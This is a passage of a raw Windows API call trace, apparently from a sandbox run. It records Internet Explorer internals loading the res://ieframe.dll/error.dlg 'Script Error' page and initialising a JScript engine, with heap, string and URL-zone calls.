returned 0 [0159.297] IsCharSpaceW (wch=0x34) returned 0 [0159.297] IsCharSpaceW (wch=0x6d) returned 0 [0159.297] IsCharSpaceW (wch=0x34) returned 0 [0159.297] IsCharSpaceW (wch=0x65) returned 0 [0159.297] IsCharSpaceW (wch=0x6d) returned 0 [0159.297] IsCharSpaceW (wch=0x0) returned 0 [0159.297] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.297] IsCharSpaceW (wch=0x3a) returned 0 [0159.297] IsCharAlphaNumericW (ch=0x3a) returned 0 [0159.297] IsCharSpaceW (wch=0x20) returned 1 [0159.297] IsCharSpaceW (wch=0x32) returned 0 [0159.297] IsCharAlphaNumericW (ch=0x32) returned 1 [0159.297] IsCharAlphaNumericW (ch=0x0) returned 0 [0159.298] IsCharSpaceW (wch=0x6d) returned 0 [0159.298] IsCharSpaceW (wch=0x32) returned 0 [0159.298] IsCharSpaceW (wch=0x32) returned 0 [0159.298] IsCharSpaceW (wch=0x6d) returned 0 [0159.298] IsCharSpaceW (wch=0x32) returned 0 [0159.298] IsCharSpaceW (wch=0x65) returned 0 [0159.298] IsCharSpaceW (wch=0x6d) returned 0 [0159.298] IsCharSpaceW (wch=0x0) returned 0 [0159.298] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x6b6598 [0159.298] StrChrW (lpStart="id", wMatch=0x3a) returned 0x0 [0159.298] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x6b5f00 [0159.299] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.299] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.299] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.299] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.299] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.299] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199d28, dwFlags=0x0 | out: pdwZone=0x199d28*=0xffffffff) returned 0x800c0011 [0159.299] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.299] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.299] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.299] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x2106, pPolicy=0x199d2c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0, pdwOutFlags=0x199d0c | out: pPolicy=0x199d2c*=0x0, pdwOutFlags=0x199d0c*=0x0) returned 0x0 [0159.299] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x2106, pPolicy=0x199d2c, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x199d2c*=0x0) returned 0x0 [0159.300] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.300] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.300] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.300] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.300] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.300] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.300] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.300] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.301] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdaa8 | out: hHeap=0x5e0000) returned 1 [0159.301] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="Content-Type", cchCount1=12, lpString2="X-UA-Compatible", cchCount2=-1) returned 1 [0159.301] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.301] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.301] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.301] StrChrW (lpStart="content", wMatch=0x3a) returned 0x0 [0159.301] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.301] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x32) returned 0x6c8a58 [0159.302] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.302] StrChrW (lpStart="http-equiv", wMatch=0x3a) returned 0x0 [0159.302] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5f28 [0159.302] StrCmpICW (pszStr1="Content-Type", pszStr2="PICS-Label") returned -13 [0159.302] StrCmpICW (pszStr1="Content-Type", pszStr2="Refresh") returned -15 [0159.302] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x6cb500 [0159.302] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb500 | out: hHeap=0x5e0000) returned 1 [0159.303] StrCmpICW (pszStr1="Content-Type", pszStr2="page-enter") returned -13 [0159.303] StrCmpICW (pszStr1="Content-Type", pszStr2="Pragma") returned -13 [0159.303] StrCmpICW (pszStr1="Content-Type", pszStr2="content-language") returned 8 [0159.303] StrCmpICW (pszStr1="Content-Type", pszStr2="Expires") returned -2 [0159.303] StrCmpICW (pszStr1="Content-Type", pszStr2="X-UA-IE9-TextLayoutMetrics") returned -21 [0159.303] StrCmpICW (pszStr1="Content-Type", pszStr2="X-UA-TextLayoutMetrics") returned -21 [0159.303] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.303] CompareStringW (Locale=0x409, dwCmpFlags=0x30001, lpString1="MSThemeCompatible", cchCount1=17, lpString2="X-UA-Compatible", cchCount2=-1) returned 1 [0159.303] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.304] StrChrW (lpStart="CONTENT", wMatch=0x3a) returned 0x0 [0159.304] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.304] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x8) returned 0x6b65a8 [0159.304] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.304] StrChrW (lpStart="HTTP-EQUIV", wMatch=0x3a) returned 0x0 [0159.304] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d8338 [0159.304] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="PICS-Label") returned -3 [0159.304] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="Refresh") returned -5 [0159.304] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x100) returned 0x6cb500 [0159.304] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6cb500 | out: hHeap=0x5e0000) returned 1 [0159.304] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="page-enter") returned -3 [0159.304] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="Pragma") returned -3 [0159.304] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="content-language") returned 10 [0159.305] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="Expires") returned 8 [0159.305] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="X-UA-IE9-TextLayoutMetrics") returned -11 [0159.305] StrCmpICW (pszStr1="MSThemeCompatible", pszStr2="X-UA-TextLayoutMetrics") returned -11 [0159.305] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.305] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x50) returned 0x68d4f0 [0159.305] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.305] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x8, Size=0x108) returned 0x6bdaa8 [0159.305] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x22) returned 0x6d8398 [0159.305] memcpy_s (in: _Destination=0x6d839c, _DestinationSize=0x1e, _Source=0x9ee525c, _SourceSize=0x4 | out: _Destination=0x6d839c) returned 0x0 [0159.305] memcpy_s (in: _Destination=0x6d83a2, _DestinationSize=0x18, _Source=0x9ee5262, _SourceSize=0x16 | out: _Destination=0x6d83a2) returned 0x0 [0159.306] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.306] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.306] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.308] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x24) returned 0x6d83c8 [0159.309] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5f78 [0159.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bdaa8 | out: hHeap=0x5e0000) returned 1 [0159.310] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6d8398 | out: hHeap=0x5e0000) returned 1 [0159.311] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1a) returned 0x6b5cd0 [0159.311] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1e) returned 0x6b5bb8 [0159.311] _wcsnicmp (_String1="Scri", _String2="data", _MaxCount=0x4) returned 15 [0159.311] SetWindowTextW (hWnd=0x103e0, lpString="Script Error") returned 1 [0159.311] GetWindowLongW (hWnd=0x103e0, nIndex=-21) returned 13854800 [0159.311] NtdllDefWindowProc_W () returned 0x1 [0159.312] memcpy_s (in: _Destination=0x1992a0, _DestinationSize=0xc28, _Source=0x6e8993e0, _SourceSize=0xc28 | out: _Destination=0x1992a0) returned 0x0 [0159.312] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.313] GetCurrentThreadId () returned 0xb48 [0159.313] GetCurrentThreadId () returned 0xb48 [0159.313] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6b5cd0 | out: hHeap=0x5e0000) returned 1 [0159.313] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x68d4f0 | out: hHeap=0x5e0000) returned 1 [0159.313] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6bac20 | out: hHeap=0x5e0000) returned 1 [0159.313] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.313] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.314] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.314] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.314] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x800) returned 0x6ddfb8 [0159.314] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x2ec) returned 0x6bc878 [0159.314] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x19a0f4 | out: ppu=0x19a0f4) returned 0x0 [0159.314] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.315] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.315] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.315] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x19a0a0, dwFlags=0x0 | out: pdwZone=0x19a0a0*=0xffffffff) returned 0x800c0011 [0159.315] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.315] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.315] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.315] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x19a0a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x19a084 | out: pPolicy=0x19a0a4*=0x0, pdwOutFlags=0x19a084*=0x0) returned 0x0 [0159.315] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x19a0a4, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x19a0a4*=0x0) returned 0x0 [0159.315] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.315] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.315] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.315] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x19a010 | out: ppu=0x19a010) returned 0x0 [0159.316] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.316] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.316] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.316] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199fbc, dwFlags=0x0 | out: pdwZone=0x199fbc*=0xffffffff) returned 0x800c0011 [0159.316] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.316] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.316] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.316] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x199fc0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x199fa0 | out: pPolicy=0x199fc0*=0x0, pdwOutFlags=0x199fa0*=0x0) returned 0x0 [0159.316] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x199fc0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x199fc0*=0x0) returned 0x0 [0159.316] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.317] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.317] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.317] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199f88 | out: ppu=0x199f88) returned 0x0 [0159.317] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.317] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.317] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.317] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199f34, dwFlags=0x0 | out: pdwZone=0x199f34*=0xffffffff) returned 0x800c0011 [0159.317] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.317] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.317] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.317] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1400, pPolicy=0x199f38, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x199f18 | out: pPolicy=0x199f38*=0x0, pdwOutFlags=0x199f18*=0x0) returned 0x0 [0159.317] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1400, pPolicy=0x199f38, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x199f38*=0x0) returned 0x0 [0159.317] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.317] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.317] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.318] CoCreateInstance (in: rclsid=0x199f4c*(Data1=0x16d51579, Data2=0xa30b, Data3=0x4c8b, Data4=([0]=0xa2, [1]=0x76, [2]=0xf, [3]=0xf4, [4]=0xdc, [5]=0x41, [6]=0xe7, [7]=0x55)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d7169f4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x199ee4 | out: ppv=0x199ee4*=0xc4fbe4) returned 0x0 [0159.318] DllGetClassObject (in: rclsid=0x5fec74*(Data1=0x16d51579, Data2=0xa30b, Data3=0x4c8b, Data4=([0]=0xa2, [1]=0x76, [2]=0xf, [3]=0xf4, [4]=0xdc, [5]=0x41, [6]=0xe7, [7]=0x55)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x199d58 | out: ppv=0x199d58*=0xc4fb88) returned 0x0 [0159.318] NdrDllGetClassObject (in: rclsid=0x5fec74*(Data1=0x16d51579, Data2=0xa30b, Data3=0x4c8b, Data4=([0]=0xa2, [1]=0x76, [2]=0xf, [3]=0xf4, [4]=0xdc, [5]=0x41, [6]=0xe7, [7]=0x55)), riid=0x76db7590*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x199d58, pProxyFileList=0x6c9dd5a4, pclsid=0x6c9ca8fc*(Data1=0xc20ed5c4, Data2=0xa2e, Data3=0x4f66, Data4=([0]=0x9b, [1]=0xe2, [2]=0x86, [3]=0xa1, [4]=0xc8, [5]=0x23, [6]=0xdd, [7]=0x68)), pPSFactoryBuffer=0x6cd08e0c | out: ppv=0x199d58*=0x0) returned 0x80040111 [0159.318] malloc (_Size=0x34) returned 0xc4fb88 [0159.319] JScriptEngine11:IClassFactory:CreateInstance (in: This=0xc4fb88, pUnkOuter=0x0, riid=0x6d7169f4*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppvObject=0x199d00 | out: ppvObject=0x199d00*=0xc4fbe4) returned 0x0 [0159.319] malloc (_Size=0x220) returned 0xc4fbc8 [0159.319] GetUserDefaultLCID () returned 0x409 [0159.319] GetACP () returned 0x4e4 [0159.319] malloc (_Size=0x30) returned 0xc5a610 [0159.319] JScriptEngine11:IUnknown:Release (This=0xc4fb88) returned 0x0 [0159.319] free (_Block=0xc4fb88) [0159.320] IUnknown:AddRef (This=0x6cdf88) returned 0x2 [0159.320] IUnknown:AddRef (This=0x68e1fc) returned 0x6 [0159.320] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.320] IInternetSecurityManager:MapUrlToZone (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", pdwZone=0x199e10, dwFlags=0x0 | out: pdwZone=0x199e10*=0xffffffff) returned 0x800c0011 [0159.320] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.320] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.320] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1 [0159.320] IInternetSecurityManagerEx2:ProcessUrlActionEx2 (in: This=0x6cdf88, pUri=0x68e1fc, dwAction=0x1401, pPolicy=0x199e14, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0, pdwOutFlags=0x199df4 | out: pPolicy=0x199e14*=0x0, pdwOutFlags=0x199df4*=0x0) returned 0x0 [0159.320] IInternetSecurityManager:ProcessUrlAction (in: This=0xd1e334, pwszUrl="res://ieframe.dll/error.dlg", dwAction=0x1401, pPolicy=0x199e14, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x199e14*=0x0) returned 0x0 [0159.320] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1 [0159.320] IUnknown:Release (This=0x6cdf88) returned 0x1 [0159.320] IUnknown:Release (This=0x68e1fc) returned 0x5 [0159.320] GetCurrentThreadId () returned 0xb48 [0159.321] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.321] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.321] GetCurrentThreadId () returned 0xb48 [0159.321] malloc (_Size=0x84) returned 0xc4fdf0 [0159.321] malloc (_Size=0x748) returned 0xc4fe80 [0159.321] malloc (_Size=0x3c) returned 0xc505d0 [0159.321] malloc (_Size=0x78) returned 0xc50618 [0159.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x654 [0159.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x658 [0159.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x65c [0159.322] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x660 [0159.322] SetEvent (hEvent=0x398) returned 1 [0159.322] SetEvent (hEvent=0x398) returned 1 [0159.322] QueryPerformanceFrequency (in: lpFrequency=0x6cd09468 | out: lpFrequency=0x6cd09468*=100000000) returned 1 [0159.322] QueryPerformanceCounter (in: lpPerformanceCount=0x6cd09460 | out: lpPerformanceCount=0x6cd09460*=3097814114327) returned 1 [0159.322] malloc (_Size=0xc) returned 0xc1a570 [0159.324] malloc (_Size=0x174) returned 0xc50698 [0159.324] malloc (_Size=0xf8) returned 0xc50818 [0159.324] malloc (_Size=0x178) returned 0xc50918 [0159.324] malloc (_Size=0xf8) returned 0xc50a98 [0159.325] malloc (_Size=0x30) returned 0xc5a760 [0159.325] malloc (_Size=0xc) returned 0xc1a7c8 [0159.325] malloc (_Size=0x12c) returned 0xc50b98 [0159.326] malloc (_Size=0xf8) returned 0xc50cd0 [0159.326] SafeArrayCopy (in: psa=0x0, ppsaOut=0x74103ec | out: ppsaOut=0x74103ec) returned 0x0 [0159.326] malloc (_Size=0xc) returned 0xc10b30 [0159.326] GetCurrentThreadId () returned 0xb48 [0159.327] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x199d78, nSize=0x27 | out: lpBuffer="") returned 0x0 [0159.327] GetCurrentThreadId () returned 0xb48 [0159.327] GetCurrentThreadId () returned 0xb48 [0159.327] ParseURLW (in: pcszURL="res://ieframe.dll/error.dlg", ppu=0x199b70 | out: ppu=0x199b70) returned 0x0 [0159.327] SysStringLen (param_1="res://ieframe.dll/error.dlg") returned 0x1b [0159.327] GetCurrentThreadId () returned 0xb48 [0159.327] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1 [0159.327] GetLocaleInfoW (in: Locale=0x409, LCType=0x1004, lpLCData=0x199e1c, cchData=6 | out: lpLCData="1252") returned 5 [0159.327] IsValidCodePage (CodePage=0x4e4) returned 1 [0159.327] GetCurrentThreadId () returned 0xb48 [0159.327] GetCurrentThreadId () returned 0xb48 [0159.329] GetCurrentThreadId () returned 0xb48 [0159.329] malloc (_Size=0x2c) returned 0xc5a568 [0159.330] GetCurrentThreadId () returned 0xb48 [0159.330] StrCmpICW (pszStr1="window", pszStr2="window") returned 0 [0159.330] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.330] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.330] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x65919caa, dwHighDateTime=0x1d7d80b)) [0159.330] GetTickCount () returned 0x1d7280c [0159.330] malloc (_Size=0x184) returned 0xc50dd0 [0159.330] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6591b03b, dwHighDateTime=0x1d7d80b)) [0159.331] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6591b03b, dwHighDateTime=0x1d7d80b)) [0159.331] GetTickCount () returned 0x1d7280c [0159.331] malloc (_Size=0x30) returned 0xc5a8e8 [0159.331] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6591c3a7, dwHighDateTime=0x1d7d80b)) [0159.331] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.331] GetCurrentThreadId () returned 0xb48 [0159.331] RtlTryEnterCriticalSection (CriticalSection=0x8c2758) returned 1 [0159.374] GetCurrentThreadId () returned 0xb48 [0159.374] GetCurrentThreadId () returned 0xb48 [0159.374] SysStringLen (param_1=0x0) returned 0x0 [0159.375] SysStringLen (param_1="res://ieframe.dll/error.dlg") returned 0x1b [0159.375] _wcsicmp (_String1="", _String2="") returned 0 [0159.375] malloc (_Size=0x45a) returned 0xc50f60 [0159.375] malloc (_Size=0x22c) returned 0xc513c8 [0159.375] malloc (_Size=0x804) returned 0xc51600 [0159.375] malloc (_Size=0x19c) returned 0xc51e10 [0159.376] free (_Block=0xc51e10) [0159.376] malloc (_Size=0xd0) returned 0xc51e10 [0159.377] malloc (_Size=0xc) returned 0xc522a8 [0159.377] malloc (_Size=0xc) returned 0xc522d8 [0159.377] malloc (_Size=0x10) returned 0xc522c0 [0159.377] malloc (_Size=0x28) returned 0xc4fb88 [0159.377] free (_Block=0xc522c0) [0159.377] malloc (_Size=0x30) returned 0xc5a990 [0159.377] free (_Block=0xc51600) [0159.377] free (_Block=0xc513c8) [0159.377] malloc (_Size=0x20) returned 0xc48598 [0159.378] malloc (_Size=0xc) returned 0xc52278 [0159.378] free (_Block=0xc50f60) [0159.378] malloc (_Size=0x18) returned 0xc50f60 [0159.378] malloc (_Size=0xc) returned 0xc52218 [0159.378] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6598f107, dwHighDateTime=0x1d7d80b)) [0159.378] GetTickCount () returned 0x1d7283b [0159.378] GetCurrentThreadId () returned 0xb48 [0159.378] GetTickCount () returned 0x1d7283b [0159.378] malloc (_Size=0x30) returned 0xc5aa38 [0159.378] VirtualAlloc (lpAddress=0x0, dwSize=0x20000, flAllocationType=0x3000, flProtect=0x4) returned 0x9640000 [0159.379] VirtualQuery (in: lpAddress=0x9640000, lpBuffer=0x199b98, dwLength=0x1c | out: lpBuffer=0x199b98*(BaseAddress=0x9640000, AllocationBase=0x9640000, AllocationProtect=0x4, RegionSize=0x20000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0159.379] VirtualProtect (in: lpAddress=0x9640000, dwSize=0x1000, flNewProtect=0x10, lpflOldProtect=0x199bb4 | out: lpflOldProtect=0x199bb4*=0x4) returned 1 [0159.382] FlushInstructionCache (hProcess=0xffffffff, lpBaseAddress=0x9640000, dwSize=0x1000) returned 1 [0159.382] GetCurrentThreadId () returned 0xb48 [0159.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6599951e, dwHighDateTime=0x1d7d80b)) [0159.382] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd70 | out: lpSystemTimeAsFileTime=0xbffd70*(dwLowDateTime=0x6599951e, dwHighDateTime=0x1d7d80b)) [0159.382] GetTickCount () returned 0x1d7284b [0159.382] GetTickCount () returned 0x1d7284b [0159.383] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xbffd78 | out: lpSystemTimeAsFileTime=0xbffd78*(dwLowDateTime=0x6599951e, dwHighDateTime=0x1d7d80b)) [0159.383] free (_Block=0xc48598) [0159.383] GetTickCount () returned 0x1d7284b [0159.383] GetTickCount () returned 0x1d7284b [0159.383] GetCurrentThreadId () returned 0xb48 [0159.383] GetCurrentThreadId () returned 0xb48 [0159.383] GetCurrentThreadId () returned 0xb48 [0159.383] GetCurrentThreadId () returned 0xb48 [0159.383] GetCurrentThreadId () returned 0xb48 [0159.384] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x6ddfb8 | out: hHeap=0x5e0000) returned 1 [0159.384] GetCurrentThreadId () returned 0xb48 [0159.384] SetEvent (hEvent=0x29c) returned 1 